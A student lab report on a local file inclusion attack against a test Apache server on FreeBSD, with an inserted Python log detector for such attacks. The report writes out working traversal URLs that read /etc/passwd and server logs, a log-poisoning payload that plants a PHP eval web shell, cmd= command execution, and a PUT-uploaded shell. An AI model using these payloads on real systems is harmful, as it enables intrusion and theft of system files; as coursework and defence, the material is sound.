
Instituto Politécnico Nacional

Escuela Superior de Ingeniería Mecánica y Eléctrica

Unidad Culhuacán
Sección de Estudios de Posgrado e Investigación

Assignment: Local File Inclusion

Student: Alfonso Enrique Velasco Ramírez


Teacher: Steven Seeley
Subject: Advanced PHP vulnerability analysis & exploitation

México D.F., 9 May 2016

Objective
Demonstrate and exploit the LFI vulnerability on an Apache server through Apache log injection.

Methods
The first thing to do is verify whether the Apache server that is the target of the attack is vulnerable. To check this we send a directory traversal request: in the URL of the web application hosted on the server we append the path /etc/passwd at the end of the string, like this:
http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00
The result of sending this URL is shown below:

Figure 1 Apache /etc/passwd content

The file we reached contains the users and password fields of the system that runs the Apache server we are attacking; it also lets us know the OS on which the server is installed, in this case FreeBSD.
Once we have verified that the vulnerability exists on the server, we proceed to find where the access log is located, because we are going to use an Apache log injection attack. For this we consult the default distro layouts:
http://wiki.apache.org/httpd/DistrosDefaultLayout

On this page we see that on FreeBSD the logs are in the /var/log/ directory.

To continue with the attack we send another directory traversal request, but now in order to obtain the access log. The URL we send is:
http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00
The response to this request is shown below; we can see all the access log entries held on the server.

Figure 3 Access logs on the Apache Server

Another test we can do is to try to get the error log of the server; for this we send the following request:
192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpderror.log%00
Below we can see that we also obtain the error log of the Apache server.

Figure 4 Error logs contained on the Apache server

Once we have found the logs of the server we proceed to inject PHP code into the server via a raw socket connection, in this case using Telnet. Once connected to the server we inject the PHP code below.
GET /<?php eval($_GET[cmd]); ?> HTTP/1.1
Where:
GET is used so that the data the server sends back as the answer to a request is visible in the browser.
eval evaluates a string as PHP code. The string must be valid PHP code and must end with a semicolon. In this case eval lets us execute the commands passed in cmd on the server.
cmd is the name of the variable that lets us send data through GET.
The process of connecting to the server and injecting the code is shown below.

Figure 5 Connection with the server and code injection

After the code injection we verify that it works correctly by sending the following URL:
http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00
The result of this request is shown below (the cmd window is only there to demonstrate that the request is sent from my IP).

Figure 6 PHPinfo obtained via LFI attack
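From the defender's side, every step described so far (the traversal probes against /etc/passwd, the inclusion of the access and error logs, the poisoned request line, and the cmd= call) leaves a trace in the very access log the attack abuses. The following detector is an added example, not part of the original report or of the exercise's code: it parses Apache combined-format log lines, flags the indicators each request carries, and correlates a host that first wrote PHP into a request line and then included a log file. The sample log lines are constructed; the hosts, timestamps and sizes are fictional.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines (fictional hosts and timestamps).
# They mimic the traversal probes, the poisoned request line and the cmd= call
# that the report describes, so the detector has something realistic to parse.
SAMPLE_LOG = r'''10.0.0.5 - - [09/May/2016:10:01:12 -0500] "GET /esime/lfi/exercise1.php?file=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [09/May/2016:10:02:30 -0500] "GET /esime/lfi/exercise1.php?file=../../../../../../etc/passwd%00 HTTP/1.1" 200 1890 "-" "Mozilla/5.0"
10.0.0.9 - - [09/May/2016:10:03:01 -0500] "GET /esime/lfi/exercise1.php?file=../../../../../../var/log/httpd-access.log%00 HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
10.0.0.9 - - [09/May/2016:10:03:40 -0500] "GET /<?php eval($_GET[cmd]); ?> HTTP/1.1" 404 209 "-" "-"
10.0.0.9 - - [09/May/2016:10:04:02 -0500] "GET /esime/lfi/exercise1.php?file=../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00 HTTP/1.1" 200 73000 "-" "Mozilla/5.0"
10.0.0.7 - - [09/May/2016:10:05:00 -0500] "PUT /notes.txt HTTP/1.1" 405 0 "-" "curl/7.47"
'''

# Combined log format: host ident user [time] "method target proto" status size ...
# The target is matched lazily so request lines that contain spaces (as a
# poisoned one does) still parse.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Each indicator is evaluated on the URL-decoded request target.
INDICATORS = [
    ("directory_traversal", re.compile(r'(?:\.\./){2,}')),
    ("sensitive_file", re.compile(r'/etc/(?:passwd|master\.passwd|shadow)\b')),
    ("log_file_include", re.compile(r'/var/log/')),
    ("php_code_in_request", re.compile(r'<\?(?:php|=)?|\b(?:eval|system|passthru|shell_exec)\s*\(')),
    ("php_call_in_parameter", re.compile(r'=[A-Za-z_]\w*\([^&]*\);')),
]

def classify(target):
    """Return the indicator names found in a URL-decoded request target."""
    decoded = unquote(target)
    found = [name for name, rx in INDICATORS if rx.search(decoded)]
    if "\x00" in decoded:  # %00 used to cut off a suffix such as .php
        found.append("null_byte")
    return found

def analyse(log_text):
    """Parse each line and keep only requests that carry at least one indicator."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = classify(m["target"])
        if indicators:
            events.append({"host": m["host"], "time": m["time"],
                           "method": m["method"], "status": m["status"],
                           "indicators": indicators})
    return events

def poisoning_chains(events):
    """Hosts that first wrote PHP into a request line and later included a log file.
    Events are in log order, so a log-file include before any poisoning is not a chain."""
    poisoned, chained = set(), set()
    for e in events:
        if "php_code_in_request" in e["indicators"]:
            poisoned.add(e["host"])
        if "log_file_include" in e["indicators"] and e["host"] in poisoned:
            chained.add(e["host"])
    return sorted(chained)

if __name__ == "__main__":
    evts = analyse(SAMPLE_LOG)
    for e in evts:
        print(e["time"], e["host"], e["method"], e["status"], ", ".join(e["indicators"]))
    print("log-poisoning chains:", poisoning_chains(evts))
```

Two points worth noting when running this over real logs: the poisoned request line is logged even though the server answered 404, so a 4xx filter would hide exactly the event that matters; and the chain logic depends on log order, which is why a log-file include that precedes any poisoning from the same host is reported as a traversal only.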

Once we are able to send cmd requests we can obtain the UID, PHPinfo, and the rc.conf data from the server; below I show the id and rc.conf data.

Figure 7 Rc.conf directory

Figure 8 Server UID

There are many ways to inject code, but most of them give the same result. One of them is to inject a .txt file via a raw socket with the PUT method; an example is shown below:
telnet 192.168.116.134 80
trying to connect 192.168.116.134 80
PUT /file_name.txt HTTP/1.1

The content of the .txt file is the following PHP code:
<? include /eval($_GET[cmd]); ?>
This code lets us obtain the server information via commands sent to Apache, like the previous process I explained before.

Conclusions
The development of this exercise wasn't successful because I couldn't obtain a remote shell. Despite this, the knowledge obtained is very valuable, because from this attack many further attacks can be carried out, and consequently they can be prevented, allowing the security student to improve. Personally I will continue with this exercise, and I hope to achieve the full objective and share it with the teacher.
